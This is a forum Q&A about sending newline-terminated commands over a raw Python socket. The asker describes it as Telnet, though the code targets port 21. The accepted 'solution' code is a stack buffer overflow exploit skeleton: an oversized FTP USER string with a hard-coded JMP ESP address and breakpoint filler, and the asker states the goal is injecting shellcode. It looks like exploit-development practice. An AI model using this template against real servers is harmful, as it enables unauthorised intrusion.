# Python simulate enter key

Tags: python, telnet

I wrote a simple Python script, which should connect to Telnet server, using a username and password.

The script is following:

```
#!/usr/bin/python

import sys
import socket

hostname = sys.argv[1]
password = "whatever"
username = "whatever"


connect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

    connect.connect((hostname, 21))


except:
        print "[-] connection error"
response = connect.recv(2000)
print response
sys.exit(1)


connect.send("user %s\%r\%n" %username)
response = connect.recv(2000)
print response



connect.send("pass %\%r\%n" %password)
response = connect.recv(2000)
print response



connect.close()
```

The Error is:

The connection is working but i can't simulate the enter key with:

```
connect.send("user %s\%r\%n" %username)
response = connect.recv(2000)
print response



connect.send("pass %\%r\%n" %password)
response = connect.recv(2000)
print response
```

So why it doesn't work?
Thanks :)

EDIT SOLUTION:

```
#!/usr/bin/python

import sys
import socket




hostname = sys.argv[1]
password = "whatever"


jmpesp= "\xED\x1E\x94\x7C"

username = "A"*485 + jmpesp + "\xcc"*(1024 - 485 - 4)


connect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

    connect.connect((hostname, 21))


except:


    print "[-] Verbindungs Fehler"
    response = connect.recv(2000)
    print response
    sys.exit(1)


connect.send("user %s\r\n" %username)
response = connect.recv(2000)
print response

connect.send("user %s\r\n" %password)
response = connect.recv(2000)
print response








connect.close()
```

Comment: do those lines get executed? You have a `sys.exit(1)` before, this will stop the program.

Comment: Try removing the '\r'.

Comment: @DominicJarmann please post your solution not as an edit but as a separate answer, that you accept.

Answer (score 1, accepted):

Python includes a library for telnet: `telnetlib`

Did you have a look at that one? https://docs.python.org/2/library/telnetlib.html#module-telnetlib

There is also an example how to use it:

```
import getpass
import sys
import telnetlib

HOST = "localhost"
user = raw_input("Enter your remote account: ")
password = getpass.getpass()

tn = telnetlib.Telnet(HOST)

tn.read_until("login: ")
tn.write(user + "\n")
if password:
    tn.read_until("Password: ")
    tn.write(password + "\n")

tn.write("ls\n")
tn.write("exit\n")

print tn.read_all()
```

Comment: The problem is, that i want to code a script with an Bufferoverflow exploit. And for that reasons i can't use this library. I just can't inject the shellcode with this library..

Comment: that's right. But you could have a look at the implementation of the lib and how they send the \n to the telnet-server. I think the write function could be useful. https://hg.python.org/cpython/file/2.7/Lib/telnetlib.py#l273

Answer (score 0):

The Solution code is:

```
#!/usr/bin/python

import sys
import socket




hostname = sys.argv[1]
password = "whatever"


jmpesp= "\xED\x1E\x94\x7C"

username = "A"*485 + jmpesp + "\xcc"*(1024 - 485 - 4)


connect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

    connect.connect((hostname, 21))


except:


    print "[-] Verbindungs Fehler"
    response = connect.recv(2000)
    print response
    sys.exit(1)


connect.send("user %s\r\n" %username)
response = connect.recv(2000)
print response

connect.send("user %s\r\n" %password)
response = connect.recv(2000)
print response








connect.close()
```

The mistake was an implementation error, which stops the programm before the code get executed.